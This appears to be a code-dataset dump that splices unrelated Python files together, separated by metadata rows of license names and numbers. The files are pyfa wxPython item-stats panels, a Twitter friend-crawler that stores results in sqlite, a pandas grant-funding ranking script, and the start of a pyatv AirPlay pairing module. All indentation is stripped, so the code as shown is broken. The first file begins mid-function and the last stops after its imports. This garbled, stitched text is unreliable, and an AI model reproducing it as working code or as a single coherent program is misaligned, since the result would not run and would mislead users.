attrIcon = self.imageList.Add(icon)
else:
attrIcon = self.imageList.Add(BitmapLoader.getBitmap("7_15", "icons"))
else:
attrIcon = self.imageList.Add(BitmapLoader.getBitmap("7_15", "icons"))
index = self.paramList.InsertImageStringItem(sys.maxint, attrName, attrIcon)
idNameMap[idCount] = attrName
self.paramList.SetItemData(index, idCount)
idCount += 1
if self.toggleView != 1:
valueUnit = str(value)
elif info and info.unit:
valueUnit = self.TranslateValueUnit(value, info.unit.displayName, info.unit.name)
else:
valueUnit = formatAmount(value, 3, 0, 0)
if self.toggleView != 1:
valueUnitDefault = str(valueDefault)
elif info and info.unit:
valueUnitDefault = self.TranslateValueUnit(valueDefault, info.unit.displayName, info.unit.name)
else:
valueUnitDefault = formatAmount(valueDefault, 3, 0, 0)
self.paramList.SetStringItem(index, 1, valueUnit)
if self.stuff is not None:
self.paramList.SetStringItem(index, 2, valueUnitDefault)
self.paramList.SortItems(lambda id1, id2: cmp(idNameMap[id1], idNameMap[id2]))
self.paramList.RefreshRows()
self.totalAttrsLabel.SetLabel("%d attributes. " % idCount)
self.Layout()
def TranslateValueUnit(self, value, unitName, unitDisplayName):
def itemIDCallback():
item = Market.getInstance().getItem(value)
return "%s (%d)" % (item.name, value) if item is not None else str(value)
def groupIDCallback():
group = Market.getInstance().getGroup(value)
return "%s (%d)" % (group.name, value) if group is not None else str(value)
def attributeIDCallback():
attribute = Attribute.getInstance().getAttributeInfo(value)
return "%s (%d)" % (attribute.name.capitalize(), value)
trans = {"Inverse Absolute Percent": (lambda: (1 - value) * 100, unitName),
"Inversed Modifier Percent": (lambda: (1 - value) * 100, unitName),
"Modifier Percent": (
lambda: ("%+.2f" if ((value - 1) * 100) % 1 else "%+d") % ((value - 1) * 100), unitName),
"Volume": (lambda: value, u"m\u00B3"),
"Sizeclass": (lambda: value, ""),
"Absolute Percent": (lambda: (value * 100), unitName),
"Milliseconds": (lambda: value / 1000.0, unitName),
"typeID": (itemIDCallback, ""),
"groupID": (groupIDCallback, ""),
"attributeID": (attributeIDCallback, "")}
override = trans.get(unitDisplayName)
if override is not None:
v = override[0]()
if isinstance(v, str):
fvalue = v
elif isinstance(v, (int, float, long)):
fvalue = formatAmount(v, 3, 0, 0)
else:
fvalue = v
return "%s %s" % (fvalue, override[1])
else:
return "%s %s" % (formatAmount(value, 3, 0), unitName)
class ItemCompare(wx.Panel):
def __init__(self, parent, stuff, item, items, context=None):
wx.Panel.__init__(self, parent)
mainSizer = wx.BoxSizer(wx.VERTICAL)
self.paramList = AutoListCtrl(self, wx.ID_ANY,
style=wx.LC_REPORT | wx.LC_SINGLE_SEL | wx.LC_VRULES | wx.NO_BORDER)
mainSizer.Add(self.paramList, 1, wx.ALL | wx.EXPAND, 0)
self.SetSizer(mainSizer)
self.toggleView = 1
self.stuff = stuff
self.currentSort = None
self.sortReverse = False
self.item = item
self.items = sorted(items,
key=lambda x: x.attributes['metaLevel'].value if 'metaLevel' in x.attributes else None)
self.attrs = {}
# get a dict of attrName: attrInfo of all unique attributes across all items
for item in self.items:
for attr in item.attributes.keys():
if item.attributes[attr].info.displayName:
self.attrs[attr] = item.attributes[attr].info
# Process attributes for items and find ones that differ
for attr in self.attrs.keys():
value = None
for item in self.items:
                # we can break as soon as this item lacks the attribute: that
                # alone means the values differ, so the attribute is kept
if attr not in item.attributes:
break
                # this is the first item for this attribute, set the initial value
if value is None:
value = item.attributes[attr].value
continue
if attr not in item.attributes or item.attributes[attr].value != value:
break
else:
# attribute values were all the same, delete
del self.attrs[attr]
self.m_staticline = wx.StaticLine(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize,
wx.LI_HORIZONTAL)
mainSizer.Add(self.m_staticline, 0, wx.EXPAND)
bSizer = wx.BoxSizer(wx.HORIZONTAL)
self.totalAttrsLabel = wx.StaticText(self, wx.ID_ANY, u" ", wx.DefaultPosition, wx.DefaultSize, 0)
bSizer.Add(self.totalAttrsLabel, 0, wx.ALIGN_CENTER_VERTICAL | wx.RIGHT)
self.toggleViewBtn = wx.ToggleButton(self, wx.ID_ANY, u"Toggle view mode", wx.DefaultPosition,
wx.DefaultSize, 0)
bSizer.Add(self.toggleViewBtn, 0, wx.ALIGN_CENTER_VERTICAL)
if stuff is not None:
self.refreshBtn = wx.Button(self, wx.ID_ANY, u"Refresh", wx.DefaultPosition, wx.DefaultSize,
wx.BU_EXACTFIT)
bSizer.Add(self.refreshBtn, 0, wx.ALIGN_CENTER_VERTICAL)
self.refreshBtn.Bind(wx.EVT_BUTTON, self.RefreshValues)
mainSizer.Add(bSizer, 0, wx.ALIGN_RIGHT)
self.PopulateList()
self.toggleViewBtn.Bind(wx.EVT_TOGGLEBUTTON, self.ToggleViewMode)
self.Bind(wx.EVT_LIST_COL_CLICK, self.SortCompareCols)
def SortCompareCols(self, event):
self.Freeze()
self.paramList.ClearAll()
self.PopulateList(event.Column)
self.Thaw()
def UpdateList(self):
self.Freeze()
self.paramList.ClearAll()
self.PopulateList()
self.Thaw()
self.paramList.resizeLastColumn(100)
def RefreshValues(self, event):
self.UpdateList()
event.Skip()
def ToggleViewMode(self, event):
self.toggleView *= -1
self.UpdateList()
event.Skip()
def processPrices(self, prices):
for i, price in enumerate(prices):
self.paramList.SetStringItem(i, len(self.attrs) + 1, formatAmount(price.price, 3, 3, 9, currency=True))
def PopulateList(self, sort=None):
if sort is not None and self.currentSort == sort:
self.sortReverse = not self.sortReverse
else:
self.currentSort = sort
self.sortReverse = False
if sort is not None:
if sort == 0: # Name sort
func = lambda x: x.name
else:
try:
# Remember to reduce by 1, because the attrs array
# starts at 0 while the list has the item name as column 0.
attr = str(self.attrs.keys()[sort - 1])
func = lambda x: x.attributes[attr].value if attr in x.attributes else None
except IndexError:
# Clicked on a column that's not part of our array (price most likely)
self.sortReverse = False
func = lambda x: x.attributes['metaLevel'].value if 'metaLevel' in x.attributes else None
self.items = sorted(self.items, key=func, reverse=self.sortReverse)
self.paramList.InsertColumn(0, "Item")
self.paramList.SetColumnWidth(0, 200)
for i, attr in enumerate(self.attrs.keys()):
name = self.attrs[attr].displayName if self.attrs[attr].displayName else attr
self.paramList.InsertColumn(i + 1, name)
self.paramList.SetColumnWidth(i + 1, 120)
self.paramList.InsertColumn(len(self.attrs) + 1, "Price")
self.paramList.SetColumnWidth(len(self.attrs) + 1, 60)
sMkt = Market.getInstance()
sMkt.getPrices([x.ID for x in self.items], self.processPrices)
for item in self.items:
i = self.paramList.InsertStringItem(sys.maxint, item.name)
for x, attr in enumerate(self.attrs.keys()):
if attr in item.attributes:
info = self.attrs[attr]
value = item.attributes[attr].value
if self.toggleView != 1:
valueUnit = str(value)
if info and info.unit:
valueUnit = self.TranslateValueUnit(value, info.unit.displayName, info.unit.name)
else:
valueUnit = formatAmount(value, 3, 0, 0)
self.paramList.SetStringItem(i, x + 1, valueUnit)
self.paramList.RefreshRows()
self.Layout()
def TranslateValueUnit(self, value, unitName, unitDisplayName):
def itemIDCallback():
item = Market.getInstance().getItem(value)
return "%s (%d)" % (item.name, value) if item is not None else str(value)
def groupIDCallback():
group = Market.getInstance().getGroup(value)
return "%s (%d)" % (group.name, value) if group is not None else str(value)
def attributeIDCallback():
attribute = Attribute.getInstance().getAttributeInfo(value)
return "%s (%d)" % (attribute.name.capitalize(), value)
trans = {"Inverse Absolute Percent": (lambda: (1 - value) * 100, unitName),
"Inversed Modifier Percent": (lambda: (1 - value) * 100, unitName),
"Modifier Percent": (
lambda: ("%+.2f" if ((value - 1) * 100) % 1 else "%+d") % ((value - 1) * 100), unitName),
"Volume": (lambda: value, u"m\u00B3"),
"Sizeclass": (lambda: value, ""),
"Absolute Percent": (lambda: (value * 100), unitName),
"Milliseconds": (lambda: value / 1000.0, unitName),
"typeID": (itemIDCallback, ""),
"groupID": (groupIDCallback, ""),
"attributeID": (attributeIDCallback, "")}
override = trans.get(unitDisplayName)
if override is not None:
v = override[0]()
if isinstance(v, str):
fvalue = v
elif isinstance(v, (int, float, long)):
fvalue = formatAmount(v, 3, 0, 0)
else:
fvalue = v
return "%s %s" % (fvalue, override[1])
else:
return "%s %s" % (formatAmount(value, 3, 0), unitName)
class ItemRequirements(wx.Panel):
def __init__(self, parent, stuff, item):
wx.Panel.__init__(self, parent, style=wx.TAB_TRAVERSAL)
# itemId is set by the parent.
self.romanNb = ["0", "I", "II", "III", "IV", "V", "VI", "VII", "VIII", "IX", "X"]
self.skillIdHistory = []
mainSizer = wx.BoxSizer(wx.VERTICAL)
self.reqTree = wx.TreeCtrl(self, style=wx.TR_DEFAULT_STYLE | wx.TR_HIDE_ROOT | wx.NO_BORDER)
mainSizer.Add(self.reqTree, 1, wx.ALL | wx.EXPAND, 0)
self.SetSizer(mainSizer)
self.root = self.reqTree.AddRoot("WINRARZOR")
self.reqTree.SetPyData(self.root, None)
self.imageList = wx.ImageList(16, 16)
self.reqTree.SetImageList(self.imageList)
skillBookId = self.imageList.Add(BitmapLoader.getBitmap("skill_small", "gui"))
self.getFullSkillTree(item, self.root, skillBookId)
self.reqTree.ExpandAll()
self.Layout()
def getFullSkillTree(self, parentSkill, parent, sbIconId):
for skill, level in parentSkill.requiredSkills.iteritems():
child = self.reqTree.AppendItem(parent, "%s %s" % (skill.name, self.romanNb[int(level)]), sbIconId)
if skill.ID not in self.skillIdHistory:
self.getFullSkillTree(skill, child, sbIconId)
self.skillIdHistory.append(skill.ID)
class ItemEffects(wx.Panel):
def __init__(self, parent, stuff, item):
wx.Panel.__init__(self, parent)
self.item = item
mainSizer = wx.BoxSizer(wx.VERTICAL)
self.effectList = AutoListCtrl(self, wx.ID_ANY,
style=wx.LC_REPORT | wx.LC_SINGLE_SEL | wx.LC_VRULES | wx.NO_BORDER)
mainSizer.Add(self.effectList, 1, wx.ALL | wx.EXPAND, 0)
self.SetSizer(mainSizer)
self.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.OnClick, self.effectList)
if config.debug:
self.Bind(wx.EVT_LIST_ITEM_RIGHT_CLICK, self.OnRightClick, self.effectList)
self.PopulateList()
def PopulateList(self):
self.effectList.InsertColumn(0, "Name")
self.effectList.InsertColumn(1, "Active")
self.effectList.InsertColumn(2, "Type")
if config.debug:
self.effectList.InsertColumn(3, "Run Time")
self.effectList.InsertColumn(4, "ID")
# self.effectList.SetColumnWidth(0,385)
self.effectList.setResizeColumn(0)
self.effectList.SetColumnWidth(1, 50)
self.effectList.SetColumnWidth(2, 80)
if config.debug:
self.effectList.SetColumnWidth(3, 65)
self.effectList.SetColumnWidth(4, 40)
item = self.item
effects = item.effects
names = list(effects.iterkeys())
names.sort()
for name in names:
index = self.effectList.InsertStringItem(sys.maxint, name)
if effects[name].isImplemented:
if effects[name].activeByDefault:
activeByDefault = "Yes"
else:
activeByDefault = "No"
else:
activeByDefault = ""
effectTypeText = ""
if effects[name].type:
for effectType in effects[name].type:
effectTypeText += effectType + " "
if effects[name].runTime and effects[name].isImplemented:
effectRunTime = str(effects[name].runTime)
else:
effectRunTime = ""
self.effectList.SetStringItem(index, 1, activeByDefault)
self.effectList.SetStringItem(index, 2, effectTypeText)
if config.debug:
self.effectList.SetStringItem(index, 3, effectRunTime)
self.effectList.SetStringItem(index, 4, str(effects[name].ID))
self.effectList.RefreshRows()
self.Layout()
def OnClick(self, event):
"""
Debug use: toggle effects on/off.
Affects *ALL* items that use that effect.
Is not stateful. Will reset if Pyfa is closed and reopened.
"""
try:
activeByDefault = getattr(self.item.effects[event.GetText()], "activeByDefault")
if activeByDefault:
setattr(self.item.effects[event.GetText()], "activeByDefault", False)
else:
setattr(self.item.effects[event.GetText()], "activeByDefault", True)
except AttributeError:
# Attribute doesn't exist, do nothing
pass
self.RefreshValues(event)
def OnRightClick(self, event):
"""
Debug use: open effect file with default application.
If effect file does not exist, create it
"""
file_ = config.getPyfaPath(os.path.join("eos", "effects", "%s.py" % event.GetText().lower()))
if not os.path.isfile(file_):
open(file_, 'a').close()
if 'wxMSW' in wx.PlatformInfo:
os.startfile(file_)
elif 'wxMac' in wx.PlatformInfo:
os.system("open " + file_)
else:
subprocess.call(["xdg-open", file_])
def RefreshValues(self, event):
self.Freeze()
self.effectList.ClearAll()
self.PopulateList()
self.effectList.RefreshRows()
self.Layout()
self.Thaw()
event.Skip()
class ItemAffectedBy(wx.Panel):
ORDER = [Fit, Ship, Citadel, Mode, Module, Drone, Fighter, Implant, Booster, Skill]
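    # ORDER fixes display precedence in the tree: fits first, then hull, mode,
    # modules, drones, fighters, implants, boosters and finally skills.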
def __init__(self, parent, stuff, item):
wx.Panel.__init__(self, parent)
self.stuff = stuff
self.item = item
self.activeFit = gui.mainFrame.MainFrame.getInstance().getActiveFit()
self.showRealNames = False
self.showAttrView = False
self.expand = -1
self.treeItems = []
mainSizer = wx.BoxSizer(wx.VERTICAL)
self.affectedBy = wx.TreeCtrl(self, style=wx.TR_DEFAULT_STYLE | wx.TR_HIDE_ROOT | wx.NO_BORDER)
mainSizer.Add(self.affectedBy, 1, wx.ALL | wx.EXPAND, 0)
self.m_staticline = wx.StaticLine(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_HORIZONTAL)
mainSizer.Add(self.m_staticline, 0, wx.EXPAND)
bSizer = wx.BoxSizer(wx.HORIZONTAL)
self.toggleExpandBtn = wx.ToggleButton(self, wx.ID_ANY, u"Expand All", wx.DefaultPosition, wx.DefaultSize, 0)
bSizer.Add(self.toggleExpandBtn, 0, wx.ALIGN_CENTER_VERTICAL)
self.toggleNameBtn = wx.ToggleButton(self, wx.ID_ANY, u"Toggle Names", wx.DefaultPosition, wx.DefaultSize, 0)
bSizer.Add(self.toggleNameBtn, 0, wx.ALIGN_CENTER_VERTICAL)
self.toggleViewBtn = wx.ToggleButton(self, wx.ID_ANY, u"Toggle View", wx.DefaultPosition, wx.DefaultSize, 0)
bSizer.Add(self.toggleViewBtn, 0, wx.ALIGN_CENTER_VERTICAL)
if stuff is not None:
self.refreshBtn = wx.Button(self, wx.ID_ANY, u"Refresh", wx.DefaultPosition, wx.DefaultSize, wx.BU_EXACTFIT)
bSizer.Add(self.refreshBtn, 0, wx.ALIGN_CENTER_VERTICAL)
self.refreshBtn.Bind(wx.EVT_BUTTON, self.RefreshTree)
self.toggleNameBtn.Bind(wx.EVT_TOGGLEBUTTON, self.ToggleNameMode)
self.toggleExpandBtn.Bind(wx.EVT_TOGGLEBUTTON, self.ToggleExpand)
self.toggleViewBtn.Bind(wx.EVT_TOGGLEBUTTON, self.ToggleViewMode)
mainSizer.Add(bSizer, 0, wx.ALIGN_RIGHT)
self.SetSizer(mainSizer)
self.PopulateTree()
self.Layout()
self.affectedBy.Bind(wx.EVT_TREE_ITEM_RIGHT_CLICK, self.scheduleMenu)
def scheduleMenu(self, event):
event.Skip()
wx.CallAfter(self.spawnMenu, event.Item)
def spawnMenu(self, item):
self.affectedBy.SelectItem(item)
stuff = self.affectedBy.GetPyData(item)
# String is set as data when we are dealing with attributes, not stuff containers
if stuff is None or isinstance(stuff, basestring):
return
contexts = []
# Skills are different in that they don't have itemModifiedAttributes,
# which is needed if we send the container to itemStats dialog. So
# instead, we send the item.
type_ = stuff.__class__.__name__
contexts.append(("itemStats", type_))
menu = ContextMenu.getMenu(stuff if type_ != "Skill" else stuff.item, *contexts)
self.PopupMenu(menu)
def ExpandCollapseTree(self):
self.Freeze()
if self.expand == 1:
self.affectedBy.ExpandAll()
else:
try:
self.affectedBy.CollapseAll()
except:
pass
self.Thaw()
def ToggleExpand(self, event):
self.expand *= -1
self.ExpandCollapseTree()
def ToggleViewTree(self):
self.Freeze()
for item in self.treeItems:
change = self.affectedBy.GetPyData(item)
display = self.affectedBy.GetItemText(item)
self.affectedBy.SetItemText(item, change)
self.affectedBy.SetPyData(item, display)
self.Thaw()
def UpdateTree(self):
self.Freeze()
self.affectedBy.DeleteAllItems()
self.PopulateTree()
self.Thaw()
def RefreshTree(self, event):
self.UpdateTree()
event.Skip()
def ToggleViewMode(self, event):
self.showAttrView = not self.showAttrView
self.affectedBy.DeleteAllItems()
self.PopulateTree()
event.Skip()
def ToggleNameMode(self, event):
self.showRealNames = not self.showRealNames
self.ToggleViewTree()
event.Skip()
def PopulateTree(self):
# sheri was here
del self.treeItems[:]
root = self.affectedBy.AddRoot("WINPWNZ0R")
self.affectedBy.SetPyData(root, None)
self.imageList = wx.ImageList(16, 16)
self.affectedBy.SetImageList(self.imageList)
if self.showAttrView:
self.buildAttributeView(root)
else:
self.buildModuleView(root)
self.ExpandCollapseTree()
def sortAttrDisplayName(self, attr):
info = self.stuff.item.attributes.get(attr)
if info and info.displayName != "":
return info.displayName
return attr
def buildAttributeView(self, root):
"""
We first build a usable dictionary of items. The key is either a fit
if the afflictions stem from a projected fit, or self.stuff if they
are local afflictions (everything else, even gang boosts at this time)
The value of this is yet another dictionary in the following format:
"attribute name": {
"Module Name": [
class of affliction,
affliction item (required due to GH issue #335)
modifier type
amount of modification
whether this affliction was projected
]
}
"""
attributes = self.stuff.itemModifiedAttributes if self.item == self.stuff.item else self.stuff.chargeModifiedAttributes
container = {}
for attrName in attributes.iterAfflictions():
            # if the value is 0 or unchanged from the original, skip this attribute
if attributes[attrName] == (attributes.getOriginal(attrName) or 0):
continue
for fit, afflictors in attributes.getAfflictions(attrName).iteritems():
for afflictor, modifier, amount, used in afflictors:
if not used or afflictor.item is None:
continue
if fit.ID != self.activeFit:
# affliction fit does not match our fit
if fit not in container:
container[fit] = {}
items = container[fit]
else:
# local afflictions
if self.stuff not in container:
container[self.stuff] = {}
items = container[self.stuff]
                    # items holds our attribute-name: affliction-list mappings
if attrName not in items:
items[attrName] = []
if afflictor == self.stuff and getattr(afflictor, 'charge', None):
# we are showing a charges modifications, see #335
item = afflictor.charge
else:
item = afflictor.item
items[attrName].append(
(type(afflictor), afflictor, item, modifier, amount, getattr(afflictor, "projected", False)))
# Make sure projected fits are on top
rootOrder = container.keys()
rootOrder.sort(key=lambda x: self.ORDER.index(type(x)))
# Now, we take our created dictionary and start adding stuff to our tree
for thing in rootOrder:
# This block simply directs which parent we are adding to (root or projected fit)
if thing == self.stuff:
parent = root
else: # projected fit
icon = self.imageList.Add(BitmapLoader.getBitmap("ship_small", "gui"))
child = self.affectedBy.AppendItem(root, "{} ({})".format(thing.name, thing.ship.item.name), icon)
parent = child
attributes = container[thing]
attrOrder = sorted(attributes.keys(), key=self.sortAttrDisplayName)
for attrName in attrOrder:
attrInfo = self.stuff.item.attributes.get(attrName)
displayName = attrInfo.displayName if attrInfo and attrInfo.displayName != "" else attrName
if attrInfo:
if attrInfo.icon is not None:
iconFile = attrInfo.icon.iconFile
icon = BitmapLoader.getBitmap(iconFile, "icons")
if icon is None:
icon = BitmapLoader.getBitmap("transparent16x16", "gui")
attrIcon = self.imageList.Add(icon)
else:
attrIcon = self.imageList.Add(BitmapLoader.getBitmap("7_15", "icons"))
else:
attrIcon = self.imageList.Add(BitmapLoader.getBitmap("7_15", "icons"))
if self.showRealNames:
display = attrName
saved = displayName
else:
display = displayName
saved = attrName
# this is the attribute node
child = self.affectedBy.AppendItem(parent, display, attrIcon)
self.affectedBy.SetPyData(child, saved)
self.treeItems.append(child)
items = attributes[attrName]
items.sort(key=lambda x: self.ORDER.index(x[0]))
for itemInfo in items:
afflictorType, afflictor, item, attrModifier, attrAmount, projected = itemInfo
if afflictorType == Ship:
itemIcon = self.imageList.Add(BitmapLoader.getBitmap("ship_small", "gui"))
elif item.icon:
bitmap = BitmapLoader.getBitmap(item.icon.iconFile, "icons")
itemIcon = self.imageList.Add(bitmap) if bitmap else -1
else:
itemIcon = -1
displayStr = item.name
if projected:
displayStr += " (projected)"
if attrModifier == "s*":
attrModifier = "*"
penalized = "(penalized)"
else:
penalized = ""
                    # this is the module node, attached under the attribute node
display = "%s %s %.2f %s" % (displayStr, attrModifier, attrAmount, penalized)
treeItem = self.affectedBy.AppendItem(child, display, itemIcon)
self.affectedBy.SetPyData(treeItem, afflictor)
def buildModuleView(self, root):
"""
We first build a usable dictionary of items. The key is either a fit
if the afflictions stem from a projected fit, or self.stuff if they
are local afflictions (everything else, even gang boosts at this time)
The value of this is yet another dictionary in the following format:
"Module Name": [
class of affliction,
set of afflictors (such as 2 of the same module),
info on affliction (attribute name, modifier, and modification amount),
item that will be used to determine icon (required due to GH issue #335)
whether this affliction is actually used (unlearned skills are not used)
]
"""
attributes = self.stuff.itemModifiedAttributes if self.item == self.stuff.item else self.stuff.chargeModifiedAttributes
container = {}
for attrName in attributes.iterAfflictions():
            # if the value is 0 or unchanged from the original, skip this attribute
if attributes[attrName] == (attributes.getOriginal(attrName) or 0):
continue
for fit, afflictors in attributes.getAfflictions(attrName).iteritems():
for afflictor, modifier, amount, used in afflictors:
if not used or getattr(afflictor, 'item', None) is None:
continue
if fit.ID != self.activeFit:
# affliction fit does not match our fit
if fit not in container:
container[fit] = {}
items = container[fit]
else:
# local afflictions
if self.stuff not in container:
container[self.stuff] = {}
items = container[self.stuff]
if afflictor == self.stuff and getattr(afflictor, 'charge', None):
# we are showing a charges modifications, see #335
item = afflictor.charge
else:
item = afflictor.item
# items hold our module: info mappings
if item.name not in items:
items[item.name] = [type(afflictor), set(), [], item, getattr(afflictor, "projected", False)]
info = items[item.name]
info[1].add(afflictor)
                    # If len(info[1]) > 1, two or more copies of the same module are active.
# Check to make sure we only include the modifier once
# See GH issue 154
if len(info[1]) > 1 and (attrName, modifier, amount) in info[2]:
continue
info[2].append((attrName, modifier, amount))
# Make sure projected fits are on top
rootOrder = container.keys()
rootOrder.sort(key=lambda x: self.ORDER.index(type(x)))
# Now, we take our created dictionary and start adding stuff to our tree
for thing in rootOrder:
# This block simply directs which parent we are adding to (root or projected fit)
if thing == self.stuff:
parent = root
else: # projected fit
icon = self.imageList.Add(BitmapLoader.getBitmap("ship_small", "gui"))
child = self.affectedBy.AppendItem(root, "{} ({})".format(thing.name, thing.ship.item.name), icon)
parent = child
items = container[thing]
order = items.keys()
order.sort(key=lambda x: (self.ORDER.index(items[x][0]), x))
for itemName in order:
info = items[itemName]
afflictorType, afflictors, attrData, item, projected = info
counter = len(afflictors)
if afflictorType == Ship:
itemIcon = self.imageList.Add(BitmapLoader.getBitmap("ship_small", "gui"))
elif item.icon:
bitmap = BitmapLoader.getBitmap(item.icon.iconFile, "icons")
itemIcon = self.imageList.Add(bitmap) if bitmap else -1
else:
itemIcon = -1
displayStr = itemName
if counter > 1:
displayStr += " x {}".format(counter)
if projected:
displayStr += " (projected)"
# this is the Module node, the attribute will be attached to this
child = self.affectedBy.AppendItem(parent, displayStr, itemIcon)
self.affectedBy.SetPyData(child, afflictors.pop())
if counter > 0:
attributes = []
for attrName, attrModifier, attrAmount in attrData:
attrInfo = self.stuff.item.attributes.get(attrName)
displayName = attrInfo.displayName if attrInfo else ""
if attrInfo:
if attrInfo.icon is not None:
iconFile = attrInfo.icon.iconFile
icon = BitmapLoader.getBitmap(iconFile, "icons")
if icon is None:
icon = BitmapLoader.getBitmap("transparent16x16", "gui")
attrIcon = self.imageList.Add(icon)
else:
attrIcon = self.imageList.Add(BitmapLoader.getBitmap("7_15", "icons"))
else:
attrIcon = self.imageList.Add(BitmapLoader.getBitmap("7_15", "icons"))
if attrModifier == "s*":
attrModifier = "*"
penalized = "(penalized)"
else:
penalized = ""
attributes.append((attrName, (displayName if displayName != "" else attrName), attrModifier,
attrAmount, penalized, attrIcon))
attrSorted = sorted(attributes, key=lambda attribName: attribName[0])
for attr in attrSorted:
attrName, displayName, attrModifier, attrAmount, penalized, attrIcon = attr
if self.showRealNames:
display = "%s %s %.2f %s" % (attrName, attrModifier, attrAmount, penalized)
saved = "%s %s %.2f %s" % (
displayName if displayName != "" else attrName,
attrModifier,
attrAmount,
penalized
)
else:
display = "%s %s %.2f %s" % (
displayName if displayName != "" else attrName,
attrModifier,
attrAmount,
penalized
)
saved = "%s %s %.2f %s" % (attrName, attrModifier, attrAmount, penalized)
treeitem = self.affectedBy.AppendItem(child, display, attrIcon)
self.affectedBy.SetPyData(treeitem, saved)
self.treeItems.append(treeitem)
|
gpl-3.0
| -3,734,646,158,873,923,000
| 38.606864
| 127
| 0.56119
| false
| 4.114082
| false
| false
| false
|
mkhuthir/learnPython
|
Book_pythonlearn_com/twitter/twfriends.py
|
1
|
2583
|
import urllib.request, urllib.parse, urllib.error
import twurl
import json
import sqlite3
TWITTER_URL = 'https://api.twitter.com/1.1/friends/list.json'
conn = sqlite3.connect('friends.sqlite')
cur = conn.cursor()
cur.execute('''CREATE TABLE IF NOT EXISTS People
(id INTEGER PRIMARY KEY, name TEXT UNIQUE, retrieved INTEGER)''')
cur.execute('''CREATE TABLE IF NOT EXISTS Follows
(from_id INTEGER, to_id INTEGER, UNIQUE(from_id, to_id))''')
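# Illustrative flow (hypothetical account): retrieving 'drchuck' with count=5
# marks that People row retrieved, inserts up to 5 new People rows and records
# up to 5 Follows edges (from_id -> to_id).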
while True:
acct = input('Enter a Twitter account, or quit: ')
if ( acct == 'quit' ) : break
if ( len(acct) < 1 ) :
cur.execute('SELECT id,name FROM People WHERE retrieved = 0 LIMIT 1')
try:
(id, acct) = cur.fetchone()
except:
print('No unretrieved Twitter accounts found')
continue
else:
cur.execute('SELECT id FROM People WHERE name = ? LIMIT 1',
(acct, ) )
try:
id = cur.fetchone()[0]
except:
cur.execute('''INSERT OR IGNORE INTO People
(name, retrieved) VALUES ( ?, 0)''', ( acct, ) )
conn.commit()
if cur.rowcount != 1 :
print('Error inserting account:',acct)
continue
id = cur.lastrowid
url = twurl.augment(TWITTER_URL, {'screen_name': acct, 'count': '5'} )
print('Retrieving account', acct)
connection = urllib.request.urlopen(url)
data = connection.read().decode()
headers = dict(connection.getheaders())
print('Remaining', headers['x-rate-limit-remaining'])
js = json.loads(data)
# print json.dumps(js, indent=4)
cur.execute('UPDATE People SET retrieved=1 WHERE name = ?', (acct, ) )
countnew = 0
countold = 0
for u in js['users'] :
friend = u['screen_name']
print(friend)
cur.execute('SELECT id FROM People WHERE name = ? LIMIT 1',
(friend, ) )
try:
friend_id = cur.fetchone()[0]
countold = countold + 1
except:
cur.execute('''INSERT OR IGNORE INTO People (name, retrieved)
VALUES ( ?, 0)''', ( friend, ) )
conn.commit()
if cur.rowcount != 1 :
print('Error inserting account:',friend)
continue
friend_id = cur.lastrowid
countnew = countnew + 1
cur.execute('''INSERT OR IGNORE INTO Follows (from_id, to_id)
VALUES (?, ?)''', (id, friend_id) )
print('New accounts=',countnew,' revisited=',countold)
conn.commit()
cur.close()
|
mit
| -3,992,820,602,990,398,000
| 32.115385
| 77
| 0.562137
| false
| 3.855224
| false
| false
| false
|
TariqAHassan/ZeitSci
|
analysis/quantitative/quantitative.py
|
1
|
2852
|
"""
Formal Python Analyses of the Data
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Python 3.5
"""
import pandas as pd
from tqdm import tqdm
from pprint import pprint
from funding_database_tools import MAIN_FOLDER
from easymoney.easy_pandas import pandas_print_full
# ------------------------------------------------------------------------------------------------
# Read in Data
# ------------------------------------------------------------------------------------------------
funding = pd.read_pickle(MAIN_FOLDER + "/Data/MasterDatabase/" + "MasterDatabaseRC8.p")
tqdm("status")
# ------------------------------------------------------------------------------------------------
# Most by Funding Year
# ------------------------------------------------------------------------------------------------
funding['StartYear'] = funding['StartYear'].astype(float)
range_funding = funding[(funding['StartYear'] >= 2005) & (funding['StartYear'] <= 2015)]
db_total = range_funding['NormalizedAmount'].sum()
d = {c: range_funding[range_funding['FunderBlock'].str.upper() == c.upper()]['NormalizedAmount'] \
.sum() / db_total for c in funding['FunderBlock'].unique()}
block_dict = {k: round(float(v) * 100, 1) for k, v in d.items()}
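# e.g. block_dict -> {'Government': 61.3, 'Industry': 12.9, ...} (illustrative
# percentages; actual figures depend on the database snapshot)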
# ------------------------------------------------------------------------------------------------
# Highest-Funded Organizations
# ------------------------------------------------------------------------------------------------
top = 250
top_orgs = funding[(funding['StartYear'].astype(float) >= 2010) & (funding['StartYear'].astype(float) < 2016)].groupby(
['OrganizationName', 'OrganizationBlock', 'StartYear'])['NormalizedAmount'].sum().reset_index()
# Get the Top Funded Orgs for Each Year
# Sort by Year and Amount
top_orgs_sorted = top_orgs.sort_values(['StartYear', 'NormalizedAmount'], ascending=[False, False]).reset_index(
drop=True)
# Get the top x per year
by_year = top_orgs_sorted.sort_values('NormalizedAmount', ascending=False).groupby('StartYear', as_index=False).head(
top)
# Sort
by_year_sorted = by_year.sort_values(['StartYear', 'NormalizedAmount'], ascending=[False, False]).reset_index(drop=True)
# Add Ranking (will only work for certain values of top)
by_year_sorted['Ranking'] = list(range(1, top + 1)) * int(round(by_year_sorted.shape[0] / top))
# Rename
by_year_sorted.columns = ['Name', 'Country', 'Start Year', 'Total Grants (USD)', 'Ranking']
# Format Money (see http://stackoverflow.com/a/3393776/4898004)
by_year_sorted['Total Grants (USD)'] = by_year_sorted['Total Grants (USD)'].map(lambda x: '{:20,.2f}'.format(x).strip())
# Reorder
by_year_sorted = by_year_sorted[['Ranking', 'Name', 'Country', 'Start Year', 'Total Grants (USD)']]
by_year_sorted.to_csv(MAIN_FOLDER + "analysis/resources/" + '2010_2015_rankings_detailed.csv', index=False)
|
gpl-3.0
| -1,514,281,424,299,409,700
| 39.169014
| 120
| 0.542426
| false
| 3.737877
| false
| false
| false
|
postlund/pyatv
|
pyatv/airplay/pairing.py
|
1
|
3297
|
"""Device pairing and derivation of encryption keys."""
import binascii
import logging
from typing import Optional
from pyatv import conf, exceptions
from pyatv.airplay.auth import AirPlayPairingProcedure
from pyatv.airplay.srp import LegacyCredentials, SRPAuthHandler, new_credentials
from pyatv.const import Protocol
from pyatv.interface import PairingHandler
from pyatv.support import error_handler
